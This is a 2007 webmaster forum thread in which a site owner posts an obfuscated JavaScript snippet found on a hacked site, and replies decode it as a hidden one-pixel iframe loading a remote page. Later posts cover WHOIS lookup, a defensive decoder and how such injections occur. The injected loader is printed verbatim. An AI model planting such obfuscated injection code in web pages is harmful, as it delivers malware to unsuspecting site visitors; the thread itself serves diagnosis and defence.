Site hacked and found this code

Does anyone know what it is?

         

bts111

1:28 pm on Apr 19, 2007 (gmt 0)

10+ Year Member



One of my sites was hacked and I found this script. Anyone have any idea what it's for?

Thanks

<!-- ~ --><SCRIPT LANGUAGE="JavaScript">

<!--

function Decode(){var temp="",i,c=0,out="";
var str="60!73!70!82!65!77!69!32!83!82!67!61!34!104
!116!116!112!58!47!47!105!118!101!99!111!110!109
!105!103!97!46!105!110!102!111!47!120!115!121
!115!49!47!105!110!100!101!120!46!112!104!112
!34!32!87!73!68!84!72!61!49!32!72!69!73!71
!72!84!61!49!32!70!82!65!77!69!66!79!82!68
!69!82!61!48!32!83!67!82!79!76!76!73!78!71
!61!78!79!62!60!47!105!102!114!97!109!101
!62!";l=str.length;while(c<=str.length-1)
{while(str.charAt(c)!='!')
temp=temp+str.charAt(c++);
c++;out=out+String.fromCharCode(temp);temp="";
}document.write(out);}

//-->

</SCRIPT><SCRIPT LANGUAGE="JavaScript">

<!--

Decode();

//-->

</SCRIPT><!-- ~ --><html>

[edited by: encyclo at 11:59 pm (utc) on April 20, 2007]
[edit reason] line breaks added to fix side-scroll [/edit]

birdbrain

2:48 pm on Apr 19, 2007 (gmt 0)



Hi there bts111,

all that I can tell you about this is that it places, via document.write(), an iframe on your page...


<iframe src="http://example.info/xsys1/index.php" width="1" height="1" scrolling="no"></iframe>

birdbrain

[edited by: jatar_k at 2:49 pm (utc) on April 19, 2007]
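The decoding described above can be done offline, without letting the script run in a browser. This is an added example, not code from the thread: the function names are hypothetical and the sample is constructed from the placeholder iframe shown in the post.

```javascript
// Added example: static decoder, never evals the sample or calls document.write().
function decodeCharCodes(encoded, delimiter = "!") {
  return encoded
    .replace(/\s+/g, "")             // tolerate re-wrapped copies of the string
    .split(delimiter)
    .filter((tok) => tok.length > 0) // the trailing delimiter leaves an empty token
    .map((tok) => {
      if (!/^\d{1,5}$/.test(tok) || Number(tok) > 0xffff) {
        throw new Error(`unexpected token: ${tok}`);
      }
      return String.fromCharCode(Number(tok));
    })
    .join("");
}

// Parse <iframe> tags as plain text and flag the ones sized to be invisible.
function findHiddenIframes(html) {
  const findings = [];
  for (const tag of html.matchAll(/<iframe\b([^>]*)>/gi)) {
    const attrs = {};
    const attrRe = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
    for (const a of tag[1].matchAll(attrRe)) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
    }
    const w = parseInt(attrs.width, 10);  // NaN when the attribute is absent
    const h = parseInt(attrs.height, 10);
    findings.push({ src: attrs.src ?? null, hidden: w <= 1 || h <= 1 });
  }
  return findings;
}

// Constructed sample: the placeholder iframe from the post, encoded in the
// same "decimal char code + !" form, with line breaks to mimic a wrapped copy.
const SAMPLE_HTML =
  '<IFRAME SRC="http://example.info/xsys1/index.php" WIDTH=1 HEIGHT=1 ' +
  "FRAMEBORDER=0 SCROLLING=NO></iframe>";
const SAMPLE_ENCODED =
  Array.from(SAMPLE_HTML, (ch) => ch.charCodeAt(0)).join("!\n") + "!";

console.log(findHiddenIframes(decodeCharCodes(SAMPLE_ENCODED)));
```

Run it under Node with the string literal copied out of the infected page in place of the constructed sample; the output is the iframe target and whether it was sized to be invisible.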

Dabrowski

9:02 pm on Apr 19, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Here's the WHOIS for that domain:

Domain ID:D1050756-LRMS
Domain Name:EXAMPLE.INFO
Created On:08-Oct-2001 16:33:16 UTC
Last Updated On:10-Jun-2002 20:54:10 UTC
Expiration Date:08-Oct-2011 16:33:16 UTC
Trademark Name:ICANNReserved
Sponsoring Registrar:Afilias Ltd. (R145-LRMS)
Status:INACTIVE
Registrant ID:C2283145-LRMS
Registrant Name:Internet Corporation for Assigned Names and Numbers
Registrant Organization:ICANN
Registrant Street1:4676 Admiralty Way
Registrant Street2:Suite 330
Registrant Street3:
Registrant City:Marina Del Rey
Registrant State/Province:CA
Registrant Postal Code:90292-6601
Registrant Country:US
Registrant Phone:+1.2157065700
Registrant Phone Ext.:
Registrant FAX:+1.2157065701
Registrant FAX Ext.:
Registrant *************@afilias.info

As you can see, status is INACTIVE and no name servers, so that IFRAME wouldn't even have been noticeable on your page.

No harm done this time, I suggest you look closer at your security though!

eelixduppy

9:28 pm on Apr 19, 2007 (gmt 0)



Dabrowski, just a little side note. The hacker's site is not example.info,
but something else. The code posted by birdbrain has been exemplified not
to give out any specifics and violate the terms of service. With that being said,
the code could still have been potentially harmful. :)

Dabrowski

10:01 pm on Apr 19, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



D'oh!

bts111

10:57 pm on Apr 19, 2007 (gmt 0)

10+ Year Member



Thanks heaps to everyone!

bjoz3000

3:49 am on Apr 25, 2007 (gmt 0)

10+ Year Member



Hi Bts111

I had the exact same issue. Did you find any info on how the JS was being inserted into the page? I was told by my web host that my computer that was uploading our web pages must have had an FTP-based virus.

I ran checks on my PC and couldn't pick anything up in Symantec or AVG virus checker, so I'm still kind of baffled how this was happening. They were telling me the virus was definitely not on the web server.

Any info much appreciated.

vincevincevince

3:56 am on Apr 25, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Almost always due to insecure scripts somewhere on their server. It might not be your site, it might be another site hosted there. I'd dump the host and move today.